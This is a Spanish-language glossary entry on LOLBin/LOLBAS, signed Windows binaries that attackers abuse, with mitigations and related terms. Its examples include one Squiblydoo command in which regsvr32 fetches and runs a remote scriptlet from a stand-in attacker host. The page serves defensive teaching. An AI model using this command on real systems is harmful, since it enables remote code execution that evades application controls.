LOLBin / LOLBAS
¿Qué es LOLBin / LOLBAS?
LOLBin / LOLBASBinario o script nativo y firmado (LOLBin/LOLBAS) que el atacante abusa para ejecutar codigo, descargar payloads, persistir o evadir controles aparentando ser una herramienta legitima.
LOLBin (Living-Off-the-Land Binary) y el proyecto mas amplio LOLBAS (Living-Off-the-Land Binaries And Scripts) catalogan binarios, scripts y bibliotecas firmados por Microsoft con efectos secundarios utiles para operaciones ofensivas: ejecutar codigo arbitrario, descargar payloads remotos o saltar controles de aplicaciones. Ejemplos habituales son rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe y certutil.exe. Como cada herramienta esta firmada y es confiable, los defensores no pueden bloquear por hash y deben distinguir lineas de comando esperadas de anomalas. Los LOLBAS sostienen muchas tecnicas de ejecucion y evasion del MITRE ATT&CK. Las mitigaciones se apoyan en allow-listing de aplicaciones, logging de ScriptBlock y creacion de procesos, reglas ASR y analitica de comportamiento del EDR.
● Ejemplos
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).
- 02
msbuild.exe payload.xml para ejecutar C# inline sin tocar disco.
● Preguntas frecuentes
¿Qué es LOLBin / LOLBAS?
Binario o script nativo y firmado (LOLBin/LOLBAS) que el atacante abusa para ejecutar codigo, descargar payloads, persistir o evadir controles aparentando ser una herramienta legitima. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.
¿Qué significa LOLBin / LOLBAS?
Binario o script nativo y firmado (LOLBin/LOLBAS) que el atacante abusa para ejecutar codigo, descargar payloads, persistir o evadir controles aparentando ser una herramienta legitima.
¿Cómo funciona LOLBin / LOLBAS?
LOLBin (Living-Off-the-Land Binary) y el proyecto mas amplio LOLBAS (Living-Off-the-Land Binaries And Scripts) catalogan binarios, scripts y bibliotecas firmados por Microsoft con efectos secundarios utiles para operaciones ofensivas: ejecutar codigo arbitrario, descargar payloads remotos o saltar controles de aplicaciones. Ejemplos habituales son rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe y certutil.exe. Como cada herramienta esta firmada y es confiable, los defensores no pueden bloquear por hash y deben distinguir lineas de comando esperadas de anomalas. Los LOLBAS sostienen muchas tecnicas de ejecucion y evasion del MITRE ATT&CK. Las mitigaciones se apoyan en allow-listing de aplicaciones, logging de ScriptBlock y creacion de procesos, reglas ASR y analitica de comportamiento del EDR.
¿Cómo defenderse de LOLBin / LOLBAS?
Las defensas contra LOLBin / LOLBAS combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para LOLBin / LOLBAS?
Nombres alternativos comunes: LOLBAS, Binario Living-off-the-Land.
● Términos relacionados
- attacks№ 616
Living off the Land
Estilo de ataque que abusa de herramientas y scripts legitimos ya instalados en el sistema victima en lugar de desplegar malware propio.
- malware№ 417
Malware sin archivos
Malware que se ejecuta principalmente en memoria y abusa de herramientas legítimas del sistema, evitando el uso de ejecutables tradicionales en disco.
- defense-ops№ 298
Evasión de Defensas
Táctica MITRE ATT&CK (TA0005) que cubre las técnicas con las que un atacante evita detección, desactiva herramientas de seguridad y oculta su actividad.
- defense-ops№ 371
EDR (Detección y Respuesta en Endpoints)
Tecnología de seguridad para endpoints que registra continuamente actividad de procesos, ficheros, registro y red para detectar, investigar y responder a amenazas en los equipos.
- defense-ops№ 682
Mimikatz
Herramienta de post-explotacion para Windows que extrae contrasenas en claro, hashes, tickets Kerberos y otras credenciales desde la memoria y LSASS.
- attacks№ 045
Bypass de AMSI
Tecnicas que desactivan, parchean o evaden la Antimalware Scan Interface de Windows para que scripts y payloads en memoria no sean analizados por los antivirus.